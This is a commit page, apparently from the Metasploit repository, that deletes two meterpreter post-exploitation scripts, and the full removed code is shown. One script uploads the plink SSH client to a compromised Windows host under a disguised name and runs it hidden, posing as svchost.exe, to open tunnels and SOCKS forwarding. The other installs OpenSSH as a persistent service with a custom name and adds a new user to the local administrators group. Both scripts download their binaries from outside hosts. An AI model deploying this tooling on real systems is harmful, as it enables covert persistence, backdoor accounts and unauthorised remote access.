Browse Source

remove a couple of broken meterpreter scripts (upstream is dead)

Brent Cook 1 year ago
parent
commit
252e80b9bf
2 changed files with 0 additions and 863 deletions
  1. 0
    455
      scripts/meterpreter/win32-sshclient.rb
  2. 0
    408
      scripts/meterpreter/win32-sshserver.rb

+ 0
- 455
scripts/meterpreter/win32-sshclient.rb View File

@@ -1,455 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# Meterpreter script to deploy & run the "plink" commandline ssh-client
10
-# supports only MS-Windows-2k/XP/Vista Hosts
11
-#
12
-# Version 1.0
13
-# written by illegalguy
14
-#
15
-require 'net/http'
16
-require 'uri'
17
-meter_type = client.platform
18
-
19
-#
20
-# Options
21
-#
22
-
23
-@@exec_opts = Rex::Parser::Arguments.new(
24
-  "-h"  => [ false, "This help menu"],
25
-  "-f"  => [ true,  "Do not download plink.exe but use given file."],
26
-  "-U"  => [ true,  "Download from given URL instead of default one (http://the.earth.li/~sgtatham/putty)"],
27
-  "-H"  => [ true,  "The IP/hostname of the SSH-server to connect to !REQUIRED!"],
28
-  "-p"  => [ true,  "The port of the remote SSH-server (Default:22)"],
29
-  "-u"  => [ true,  "The username to use to login to the SSH-server !REQUIRED!"],
30
-  "-P"  => [ true,  "login with specified password"],
31
-  "-b"  => [ false, "disable all interactive prompts"],
32
-  "-R"  => [ true,  "Forward remote port to local address ([listen-IP:]listen-port:host:port)"],
33
-  "-L"  => [ true,  "Forward local port to remote address ([listen-IP:]listen-port:host:port)"],
34
-  "-D"  => [ true,  "Dynamic SOCKS-based port forwarding ([listen-IP:]listen-port)"],
35
-  "-C"  => [ false, "enable compression"],
36
-  "-X"  => [ false, "enable X11 forwarding"],
37
-  "-x"  => [ false, "disable X11 forwarding"],
38
-  "-A"  => [ false, "enable agent forwarding"],
39
-  "-a"  => [ false, "disable agent forwarding"],
40
-  "-1"  => [ false, "use SSH-protocol-version 1"],
41
-  "-2"  => [ false, "use SSH-protocol-version 2"],
42
-  "-4"  => [ false, "use IPv4"],
43
-  "-6"  => [ false, "use IPv6"],
44
-  "-i"  => [ true,  "private key-file for authentication"],
45
-  "-m"  => [ true,  "read remote command from file"],
46
-  "-s"  => [ false, "remote command is an ssh-subsystem(SSH2 only)"],
47
-  "-N"  => [ false, "Don`t start a shell/command (SSH2 only)"],
48
-  "-n"  => [ true,  "open tunnel in place of session (SSH-2 only) (host:port)"],
49
-  "-r"  => [ true,  "Set SSH-Server`s Hostkey as known Host in Windows-registry before starting the client"],
50
-  "-F"  => [ false, "Disable ram-mode, upload plink and run from disk. Attention : no auto-cleanup when using -N AND -F !"],
51
-  "-E"  => [ true, "Start process from memory as given (Target Machine`s!) Application (.exe) (Default: C:\\windows\\system32)"],
52
-  "-v"  => [ false, "Give additional (debugging-)output"]
53
-)
54
-
55
-def usage
56
-  print_line("plink ssh-client deploy+run script")
57
-  print_line("This script will upload and run a plink ssh-cient")
58
-  print_line(@@exec_opts.usage)
59
-  raise Rex::Script::Completed
60
-end
61
-
62
-# Wrong Meterpreter Version Message Function
63
-#-------------------------------------------------------------------------------
64
-def wrong_meter_version(meter = meter_type)
65
-  print_error("#{meter} version of Meterpreter is not supported with this Script!")
66
-  raise Rex::Script::Completed
67
-end
68
-#
69
-# Default parameters
70
-#
71
-
72
-plink = File.join(Msf::Config.data_directory, "plink.exe")
73
-
74
-#plinkurl = 'http://the.earth.li/~sgtatham/putty/latest/x86/plink.exe'
75
-#plinkurl = 'http://the.earth.li/~sgtatham/putty/0.60/x86/plink.exe'
76
-plinkurl = 'http://updates.metasploit.com/data/win32-ssh/plink.exe'
77
-license = <<-EOS
78
-PuTTY is copyright 1997-2010 Simon Tatham.
79
-Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watson, and CORE SDI S.A.
80
-
81
-Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
82
-The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
83
-
84
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL SIMON TATHAM BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.'
85
-EOS
86
-
87
-
88
-#
89
-# Define required functions
90
-#
91
-
92
-def upload(client,file,trgloc = nil)
93
-  if not ::File.exist?(file)
94
-    raise "File to Upload does not exists!"
95
-  else
96
-    if trgloc == nil
97
-      location = client.sys.config.getenv('TEMP')
98
-    else
99
-      location = trgloc
100
-    end
101
-    begin
102
-      if file =~ /S*(.exe)/i
103
-        fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
104
-      else
105
-        fileontrgt = "#{location}\\TMP#{rand(100)}"
106
-      end
107
-      print_status("Uploading #{file}....")
108
-      client.fs.file.upload_file(fileontrgt, file)
109
-      print_status("#{file} successfully uploaded to #{fileontrgt}!")
110
-    rescue ::Exception => e
111
-      print_status("Error uploading file #{file}: #{e.class} #{e}")
112
-    end
113
-  end
114
-  return fileontrgt
115
-end
116
-
117
-
118
-#
119
-# Option parsing
120
-#
121
-username = nil
122
-password = nil
123
-rhost = nil
124
-rport = 22
125
-manual = nil
126
-hostkey = nil
127
-batchmode = nil
128
-remotefwd = nil
129
-localfwd = nil
130
-socksfwd = nil
131
-enablecompression = nil
132
-enablex11fwd = nil
133
-disablex11fwd = nil
134
-enableagentfwd = nil
135
-disableagentfwd = nil
136
-sshv1 = nil
137
-sshv2 = nil
138
-ipv4 = nil
139
-ipv6 = nil
140
-keyfile = nil
141
-cmdfile = nil
142
-sshsubsys = nil
143
-noshell = nil
144
-nctunnel = nil
145
-processname = "C:\\windows\\system32\\svchost.exe"
146
-verbose = nil
147
-filemode = nil
148
-downloaded = nil
149
-
150
-@@exec_opts.parse(args) { |opt, idx, val|
151
-  case opt
152
-  when "-h"
153
-    usage
154
-  when "-H"
155
-    if !val
156
-      print_error("-H requires an argument !")
157
-      usage
158
-    end
159
-    rhost = val
160
-
161
-  when "-f"
162
-    if !val
163
-      print_error("-f requires an argument !")
164
-      usage
165
-    end
166
-    plink = val
167
-    if not ::File.exist?(plink)
168
-      print_error("Plink.exe not found/accessible!")
169
-      usage
170
-    end
171
-    manual = true
172
-
173
-  when "-r"
174
-    if !val
175
-      print_error("-r requires an argument !")
176
-      usage
177
-    end
178
-    hostkey = val
179
-
180
-  when "-p"
181
-    rport = val.to_i
182
-
183
-  when "-U"
184
-    if !val
185
-      print_error("-u requires an argument !")
186
-      usage
187
-    end
188
-    plinkurl = val
189
-
190
-  when "-u"
191
-    if !val
192
-      print_error("-u requires an argument !")
193
-      usage
194
-    end
195
-    username = val
196
-
197
-  when "-P"
198
-    if !val
199
-      print_error("-P requires an argument !")
200
-      usage
201
-    end
202
-    password = val
203
-
204
-  when "-b"
205
-    batchmode = true
206
-
207
-  when "-R"
208
-    if !val
209
-      print_error("-R requires an argument !")
210
-      usage
211
-    end
212
-    remotefwd = val
213
-
214
-  when "-L"
215
-    if !val
216
-      print_error("-L requires an argument !")
217
-      usage
218
-    end
219
-    localfwd = val
220
-
221
-  when "-D"
222
-    if !val
223
-      print_error("-D requires an argument !")
224
-      usage
225
-    end
226
-    socksfwd = val
227
-
228
-  when "-C"
229
-    enablecompression = true
230
-
231
-  when "-X"
232
-    enablex11fwd = true
233
-
234
-  when "-x"
235
-    disablex11fwd = true
236
-
237
-  when "-A"
238
-    enableagentfwd = true
239
-
240
-  when "-a"
241
-    disableagentfwd = true
242
-
243
-  when "-1"
244
-    sshv1 = true
245
-
246
-  when "-2"
247
-    sshv2 = true
248
-
249
-  when "-4"
250
-    ipv4 = true
251
-
252
-  when "-6"
253
-    ipv6 = true
254
-
255
-  when "-i"
256
-    if !val
257
-      print_error("-i requires an argument !")
258
-      usage
259
-    end
260
-    keyfile = val
261
-    if not ::File.exist?(keyfile)
262
-      print_error("keyfile not found or not accessible!")
263
-      usage
264
-    end
265
-
266
-  when "-m"
267
-    if !val
268
-      print_error("-m requires an argument !")
269
-      usage
270
-    end
271
-    cmdfile = val
272
-    if not ::File.exist?(cmdfile)
273
-      print_error("cmd-file not found/accessible!")
274
-      usage
275
-    end
276
-
277
-  when "-s"
278
-    sshsubsys = true
279
-
280
-  when "-N"
281
-    noshell = true
282
-
283
-  when "-n"
284
-    if !val
285
-      print_error("-n requires an argument !")
286
-      usage
287
-    end
288
-    nctunnel = val
289
-
290
-  when "-E"
291
-    if !val
292
-      print_error("-E requires an argument !")
293
-      usage
294
-    end
295
-    processname = val
296
-
297
-  when "-v"
298
-    verbose = true
299
-
300
-  when "-F"
301
-    filemode = true
302
-
303
-  else
304
-    print_error("Unknown option: #{opt}")
305
-    usage
306
-  end
307
-}
308
-
309
-# Check for Version of Meterpreter
310
-wrong_meter_version(meter_type) if meter_type != 'windows'
311
-
312
-
313
-if not rhost or not username
314
-  print_status("You must specify a hostname (-H) and username (-u)")
315
-  raise Rex::Script::Completed
316
-end
317
-
318
-#
319
-# Check if plink-file exists, and if not : download from putty-site first
320
-# Ask user before downloading
321
-#
322
-if not manual
323
-  if not ::File.exist?(plink)
324
-    print_status("plink.exe could not be found. Downloading it now...")
325
-    print_status(license)
326
-    plinkexe = Net::HTTP.get URI.parse(plinkurl)
327
-    File.open(plink, "wb") { |fd| fd.write(plinkexe) }
328
-    print_status("plink.exe has been downloaded to #{plink} (local machine). Please remove manually after use or keep for reuse.")
329
-    downloaded = true
330
-  end
331
-end
332
-
333
-#
334
-# Uploading files to target
335
-#
336
-cmdfileontrgt = upload(client, cmdfile) if cmdfile
337
-keyfileontrgt = upload(client, keyfile) if keyfile
338
-
339
-trg_filename = nil
340
-if filemode
341
-  print_status("-------Uploading plink -------")
342
-  trg_filename = upload(client, plink)
343
-else
344
-  trg_filename = plink
345
-end
346
-
347
-#
348
-# Build parameter-string
349
-#
350
-params = "-ssh "
351
-params << "-P #{rport} "          if not rport == 22
352
-params << "-l #{username} "
353
-params << "-pw #{password} "      if password
354
-params << "-batch "               if batchmode
355
-params << "-R #{remotefwd} "      if remotefwd
356
-params << "-L #{localfwd} "       if localfwd
357
-params << "-D #{socksfwd} "       if socksfwd
358
-params << "-C "                   if enablecompression
359
-params << "-X "                   if enablex11fwd
360
-params << "-x "                   if disablex11fwd
361
-params << "-A "                   if enableagentfwd
362
-params << "-a "                   if disableagentfwd
363
-params << "-1 "                   if sshv1
364
-params << "-2 "                   if sshv2
365
-params << "-4 "                   if ipv4
366
-params << "-6 "                   if ipv6
367
-params << "-m #{cmdfileontrgt} "  if cmdfileontrgt
368
-params << "-i #{keyfileontrgt} "  if keyfileontrgt
369
-params << "-s "                   if sshsubsys
370
-params << "-N "                   if noshell
371
-params << "-nc #{nctunnel} "      if nctunnel
372
-
373
-params << rhost
374
-
375
-
376
-#
377
-# Set Registry-Value before running the client, if the param was specified
378
-#
379
-hostkeyname = nil
380
-if not hostkey == nil
381
-  hostkeyname = "rsa2@#{rport}:#{rhost}"
382
-  print_status("Writing the Hostkey to the registry...")
383
-  client.run_cmd("reg setval -k HKEY_CURRENT_USER\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys -v #{hostkeyname} -d #{hostkey}")
384
-end
385
-
386
-#
387
-# Give additional output when -v is set
388
-#
389
-if verbose
390
-  print_status("You set the following parameters for plink :")
391
-  print_status(params)
392
-  print_status(processname)
393
-end
394
-
395
-#
396
-# Execute the client
397
-#
398
-
399
-print_status("-------Executing Client ------")
400
-
401
-p = nil
402
-if not filemode
403
-  p = client.sys.process.execute(trg_filename, params, {'Hidden' => true, 'Channelized' => true, 'InMemory' => processname})
404
-else
405
-  p = client.sys.process.execute(trg_filename, params, {'Hidden' => true, 'Channelized' => true})
406
-end
407
-
408
-if noshell == nil
409
-  client.console.run_single("interact #{p.channel.cid}")
410
-end
411
-
412
-if filemode
413
-  if not noshell == true
414
-    if verbose
415
-      print_status("Waiting 3 seconds to be sure the process was closed.")
416
-    end
417
-    sleep(3)
418
-    if verbose
419
-      print_status("Deleting the uploaded plink.exe...")
420
-    end
421
-    client.fs.file.rm(trg_filename)
422
-  else
423
-    print_status("Cannot automatically delete the uploaded #{trg_filename} ! Please delete it manually after stopping the process!")
424
-  end
425
-end
426
-
427
-if not keyfile == nil
428
-  if verbose
429
-    print_status("Waiting 1 second to be sure the keyfile is not in use anymore.")
430
-  end
431
-  sleep(1)
432
-  if verbose
433
-    print_status("Deleting the keyfile !")
434
-  end
435
-  if verbose
436
-    print_status(keyfile)
437
-  end
438
-  client.fs.file.rm(keyfile)
439
-end
440
-
441
-if not cmdfile == nil
442
-  print_status("You need to manually delete the uploaded #{cmdfile} !")
443
-end
444
-
445
-#
446
-# Delete the registry-key that may have been created
447
-#
448
-if not hostkey == nil
449
-  if verbose
450
-    print_status("Deleting the registry-key set by the script.")
451
-  end
452
-  client.run_cmd("reg deleteval -k HKEY_CURRENT_USER\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys -v #{hostkeyname}")
453
-end
454
-
455
-raise Rex::Script::Completed

+ 0
- 408
scripts/meterpreter/win32-sshserver.rb View File

@@ -1,408 +0,0 @@
1
-##
2
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
-# If you'd like to imporve this script, please try to port it as a post
4
-# module instead. Thank you.
5
-##
6
-
7
-
8
-#
9
-# meterpreter-script to deploy + run OpenSSH
10
-# on the target machine
11
-#
12
-# written by Oliver "illegalguy" Kleinecke
13
-# v.1.0 2010-04-25
14
-#
15
-
16
-require 'net/http'
17
-meter_type = client.platform
18
-#
19
-# Options
20
-#
21
-
22
-@@exec_opts = Rex::Parser::Arguments.new(
23
-  "-h"  => [ false, "This help menu"],
24
-  "-f"  => [ true,  "The filename of the OpenSSH-SFX to deploy. (Default is to auto-download from meterpreter.illegalguy.hostzi.com"],
25
-  "-U"  => [ true, "Download OpenSSH-SFX from given URL"],
26
-  "-u"  => [ true, "Add windows-user (autoadded to local administrators"],
27
-  "-p"  => [ true, "Password for the new user"],
28
-  "-r"  => [ false, "Uninstall OpenSSH + delete added user (ATTENTION: will only uninstall OpenSSH-installations that were deployed by this script!!)"],
29
-  "-I"  => [ true, "Install OpenSSH to the given directory"],
30
-  "-F"  => [ false, "Force overwriting of registry-values"],
31
-  "-S"  => [ true, "Set custom service description"],
32
-  "-N"  => [ true, "Set custom service name"],
33
-  "-m"  => [ true, "Do not start the OpenSSH-service after installation"],
34
-  "-t"  => [ true, "Set start-type of the service to manual (Default: auto)"]
35
-  )
36
-
37
-def usage
38
-  print_line("OpenSSH-server deploy+run script")
39
-  print_line("This script will deploy OpenSSH + run the SSH-server as a service")
40
-  print_line(@@exec_opts.usage)
41
-  raise Rex::Script::Completed
42
-end
43
-
44
-def createkey(key)
45
-  root_key, base_key = client.sys.registry.splitkey(key)
46
-  open_key = client.sys.registry.create_key(root_key, base_key)
47
-end
48
-
49
-def deletekey(key)
50
-  root_key, base_key = client.sys.registry.splitkey(key)
51
-  rtrncode = client.sys.registry.delete_key(root_key, base_key)
52
-  return rtrncode
53
-end
54
-
55
-def setval(key, value, data, type = "REG_SZ")
56
-  root_key, base_key = client.sys.registry.splitkey(key)
57
-  open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE)
58
-  open_key.set_value(value, client.sys.registry.type2str(type), data)
59
-end
60
-
61
-def queryval(key, value)
62
-  root_key, base_key = client.sys.registry.splitkey(key)
63
-  hkey = client.sys.registry.open_key(root_key, base_key)
64
-  valdata = hkey.query_value(value)
65
-  return valdata.data
66
-end
67
-
68
-# Wrong Meterpreter Version Message Function
69
-#-------------------------------------------------------------------------------
70
-def wrong_meter_version(meter = meter_type)
71
-  print_error("#{meter} version of Meterpreter is not supported with this Script!")
72
-  raise Rex::Script::Completed
73
-end
74
-
75
-#
76
-# Default values
77
-#
78
-extractfilename = File.join(Msf::Config.data_directory, "/openssh-extract.sfx")
79
-manual = false
80
-username = "none"
81
-password = nil
82
-downloadurl = 'http://updates.metasploit.com/data/win32-ssh/openssh.sfx'
83
-uninstall = nil
84
-installpath = nil
85
-license = 'Please go to https://olex.openlogic.com/licenses/openssh-license for license information!'
86
-extractexe = nil
87
-warning = 'Script stopped. There are openssh/cygwin-registrykeys on the target host. Please uninstall the service(s) first, or use -F!'
88
-forced = nil
89
-servicename = "OpenSSHd"
90
-servicedesc = "OpenSSH-Server"
91
-noauto = false
92
-dirname = nil
93
-type = "auto"
94
-
95
-
96
-#
97
-# Option parsing
98
-#
99
-@@exec_opts.parse(args) { |opt, idx, val|
100
-  case opt
101
-
102
-  when "-h"
103
-    usage
104
-
105
-  when "-f"
106
-    if !val
107
-      print_error("-f requires the SFX-filename as argument !")
108
-      usage
109
-    end
110
-    extractfilename = val
111
-    if not ::File.exist?(extractfilename)
112
-      print_error("OpenSSH-SFX not found/accessible!")
113
-      usage
114
-    end
115
-    manual = true
116
-
117
-  when "-U"
118
-    if !val
119
-      print_error("-U requires the download-URL for the OpenSSH-SFX as argument !")
120
-      usage
121
-    end
122
-    downloadurl = val
123
-
124
-  when "-p"
125
-    if !val
126
-      print_error("-p requires the password (for the windows-user to add) as argument !")
127
-      usage
128
-    end
129
-    if val.length > 14
130
-      print_error("Password must not be longer than 14chars due to \"net user .. /ADD\" restrictions, sorry !")
131
-      usage
132
-    end
133
-    password = val
134
-
135
-  when "-u"
136
-    if !val
137
-      print_error("-u requires the username (for the windows-user to add) as argument!")
138
-      usage
139
-    end
140
-    username = val
141
-
142
-  when "-r"
143
-    uninstall = true
144
-
145
-  when "-I"
146
-    if !val
147
-      print_error("-I requires a directory-name to use as installpath")
148
-      usage
149
-    end
150
-    dirname = val
151
-
152
-  when "-F"
153
-    forced = true
154
-
155
-  when "-S"
156
-    if !val
157
-      print_error("-S requires s custom string to use as the service-description")
158
-      usage
159
-    end
160
-    servicedesc = val
161
-
162
-  when "-N"
163
-    if !val
164
-      print_error("-N requires a custom string to use as service-name")
165
-      usage
166
-    end
167
-    servicename = val
168
-
169
-  when "-m"
170
-    noauto = true
171
-
172
-  when "-t"
173
-    type = manual
174
-
175
-  else
176
-    print_error("Unknown option: #{opt}")
177
-    usage
178
-  end
179
-}
180
-
181
-# Check for Version of Meterpreter
182
-wrong_meter_version(meter_type) if meter_type != 'windows'
183
-
184
-#
185
-# Uninstall if selected
186
-#
187
-if uninstall
188
-  username = nil
189
-  servicename = nil
190
-  begin
191
-    dirname = queryval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "native")
192
-  rescue
193
-    print_status("Could not find any sshd installed by this script. Please remove manually!")
194
-    deletekey("HKLM\\Software\\Cygnus\ Solutions")
195
-    raise Rex::Script::Completed
196
-  end
197
-  uninstallfile = "#{dirname}\\etc\\uninst.bak"
198
-  uf = client.fs.file.new(uninstallfile, "rb")
199
-  while not uf.eof?
200
-    linesarray = uf.read.split("\r\n")
201
-    username = linesarray[0]
202
-    servicename = linesarray[1]
203
-  end
204
-  uf.close
205
-  # stop sshd-service, delete it, delete user + files afterwards
206
-  print_status("Stopping the #{servicename}-service....")
207
-  client.sys.process.execute("cmd.exe", "/c sc stop #{servicename}")
208
-  sleep 2
209
-  print_status("#{servicename} has been stopped.")
210
-  print_status("Deleting the #{servicename}-service....")
211
-  client.sys.process.execute("cmd.exe", "/c sc delete #{servicename}")
212
-  sleep 1
213
-  print_status("#{servicename} has been deleted.")
214
-  unless username.strip == "none"
215
-    print_status("Deleting user #{username}......")
216
-    client.sys.process.execute("cmd.exe", "/c net user #{username} /DELETE")
217
-    print_status("User #{username} has been deleted")
218
-  end
219
-  print_status("Deleting the directory #{dirname}....")
220
-  client.sys.process.execute("cmd.exe", "/c rmdir /S /Q #{dirname}")
221
-  print_status("#{dirname} has been deleted.")
222
-  print_status("Deleting regkeys ....")
223
-  deletekey("HKLM\\Software\\Cygnus\ Solutions")
224
-  print_status("Registry-keys have been deleted .")
225
-  print_status("Uninstall completed!")
226
-  raise Rex::Script::Completed
227
-end
228
-
229
-#
230
-# Check for OpenSSH/Cygwin - Regkeys first and bail out if they exist
231
-#
232
-root_key, base_key = client.sys.registry.splitkey("HKLM\\Software\\Cygnus\ Solutions")
233
-open_key = client.sys.registry.open_key(root_key, base_key)
234
-keys = open_key.enum_key
235
-if ( keys.length > 0)
236
-  if not forced
237
-    print_error(warning)
238
-    raise Rex::Script::Completed
239
-  end
240
-end
241
-
242
-#
243
-# If file doesn`t exist and file was not manually specified : auto-download
244
-#
245
-
246
-if manual == false
247
-  if not ::File.exist?(extractfilename)
248
-    print_status("openssh-extract.sfx could not be found. Downloading it now...")
249
-    print_status(license)
250
-    extractexe = Net::HTTP.get URI.parse(downloadurl)
251
-    open(extractfilename, "wb") { |fd| fd.write(extractexe) }
252
-    print_status("openssh-extract.sfx has been downloaded to #{extractfilename} (local machine). Please remove manually after use or keep for reuse.")
253
-    downloaded = true
254
-  end
255
-end
256
-
257
-#
258
-# Generate sshd-dir + upload file to client
259
-#
260
-if dirname == nil
261
-  dirname = client.fs.file.expand_path("%TEMP%") + '\\' + "#{rand(36 ** 8).to_s(36).rjust(8,"0")}"
262
-  print_status("Creating directory #{dirname}.....")
263
-  client.fs.dir.mkdir(dirname)
264
-else
265
-  if  !::File.exist?(dirname) && !::File.directory?(dirname)
266
-    print_status("Creating directory #{dirname}.....")
267
-    client.fs.dir.mkdir(dirname)
268
-  end
269
-end
270
-fileontrgt = "#{dirname}\\#{rand(36 ** 8).to_s(36).rjust(8,"0")}.exe"
271
-print_status("Uploading #{extractfilename} to #{fileontrgt}....")
272
-client.fs.file.upload_file(fileontrgt, extractfilename)
273
-print_status("#{extractfilename} successfully uploaded to #{fileontrgt}!")
274
-
275
-
276
-# Get required infos about the target-system
277
-clientenv = Hash.new
278
-envtxtname = "#{dirname}\\#{rand(36 ** 8).to_s(36).rjust(8,"0")}.txt"
279
-client.sys.process.execute("cmd.exe", "/c set > #{envtxtname}")
280
-
281
-fd = client.fs.file.new(envtxtname, "rb")
282
-while not fd.eof?
283
-  linesarray = fd.read.split("\r\n")
284
-  linesarray.each { |line|
285
-    currentline = line.split('=')
286
-    envvarname = currentline[0]
287
-    envvarvalue = currentline[1]
288
-    clientenv[envvarname] = envvarvalue
289
-  }
290
-end
291
-fd.close
292
-
293
-# Do not continue if client-os is not valid
294
-
295
-unless clientenv["OS"] == 'Windows_NT'
296
-  print_error("This script will run on Windows-NT based OS only!")
297
-  raise Rex::Script::Completed
298
-end
299
-
300
-
301
-# Extract the files
302
-
303
-print_status("Extracting the files ...")
304
-client.sys.process.execute(fileontrgt)
305
-sleep 3
306
-print_status("Files extracted .. ")
307
-
308
-#
309
-# Import required registry keys
310
-#
311
-homebase = clientenv["ALLUSERSPROFILE"].slice(0,clientenv["ALLUSERSPROFILE"].rindex('\\'))
312
-
313
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2")
314
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/")
315
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "native", dirname)
316
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "flags", 10, "REG_DWORD")
317
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home")
318
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home", "native", homebase)
319
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home", "flags", 10, "REG_DWORD")
320
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin")
321
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin", "native", "#{dirname}/bin")
322
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin", "flags", 10, "REG_DWORD")
323
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\Program Options")
324
-
325
-#
326
-# Provide ACL for System User
327
-#
328
-client.sys.process.execute("cacls.exe", "#{dirname} /E /T /G SYSTEM:F")
329
-
330
-#
331
-# Add windows-user if requested
332
-#
333
-unless username == "none"
334
-  if password == nil
335
-    print_error("You need to provide a nonempty password for the user with the \"-p\"-parameter!")
336
-    usage
337
-  end
338
-
339
-  #Get localized name for windows-admin-grp
340
-  admingrpname = nil
341
-  client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkgroup.exe -l > #{dirname}\\groupnames.txt")
342
-  sleep 1
343
-  fd = client.fs.file.new("#{dirname}\\groupnames.txt", "rb")
344
-  while not fd.eof?
345
-    linesarray = fd.read.split("\n")
346
-    linesarray.each { |line|
347
-      if line[0..4] =~ /[aA]dmin/
348
-        admingrpname = line.slice!(/[aA]dmin[a-z]+/)
349
-      end
350
-    }
351
-  end
352
-  fd.close
353
-  sleep 2
354
-  client.fs.file.rm("#{dirname}\\groupnames.txt")
355
-  print_line("Adding user #{username}....")
356
-  client.sys.process.execute("cmd.exe", "/c net user #{username} #{password} /ADD /HOMEDIR:#{dirname}")
357
-  print_line("Add user #{username} to #{admingrpname}")
358
-  client.sys.process.execute("cmd.exe", "/c net localgroup #{admingrpname} #{username} /ADD")
359
-end
360
-
361
-#
362
-# Generate /etc/passwd + /etc/group files
363
-#
364
-print_status("Generating /etc/passwd + /etc/group files....")
365
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkpasswd.exe -l > #{dirname}\\etc\\passwd")
366
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkgroup.exe -l > #{dirname}\\etc\\group")
367
-
368
-#
369
-# Generate SSH-keypairs
370
-#
371
-print_status("Generating SSH-keys .....")
372
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t dsa -f /etc/ssh_host_dsa_key -N \"\"")
373
-sleep 1
374
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t rsa1 -f /etc/ssh_host_key -N \"\"")
375
-sleep 1
376
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t rsa -f /etc/ssh_host_rsa_key -N \"\"")
377
-
378
-#
379
-# Add OpenSSH - Service
380
-#
381
-print_status("Adding OpenSSHd-Service.......")
382
-if type == manual
383
-  client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\cygrunsrv.exe --install #{servicename} --path /usr/sbin/sshd --args \"-D\" --dep \"Tcpip\" --stderr \"/var/log/opensshd.log\" --env \"CYGWIN=binmode ntsec tty\" --type manual --disp \"#{servicedesc}\"")
384
-else
385
-  client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\cygrunsrv.exe --install #{servicename} --path /usr/sbin/sshd --args \"-D\" --dep \"Tcpip\" --stderr \"/var/log/opensshd.log\" --env \"CYGWIN=binmode ntsec tty\" --disp \"#{servicedesc}\"")
386
-end
387
-print_status("Service successfully installed!")
388
-sleep 2
389
-
390
-#
391
-# Save "settings" to txtfile, to be able to del correct user etc afterwards
392
-#
393
-uninstallfile = "#{dirname}\\etc\\uninst.bak"
394
-uf = client.fs.file.new(uninstallfile, "w")
395
-uf.write "#{username} \r\n"
396
-uf.write "#{servicename} \r\n"
397
-uf.close
398
-
399
-
400
-# Run OpenSSH-service unless noauto was specified
401
-unless noauto
402
-  print_status("Starting OpenSSH-Service....")
403
-  client.sys.process.execute("cmd.exe", "/c net start #{servicename}")
404
-  sleep 1
405
-  print_status("OpenSSHd has been started!")
406
-end
407
-
408
-# Display OpenSSH-Hostkey, so that user may pass this to sshclient-script directly

Loading…
Cancel
Save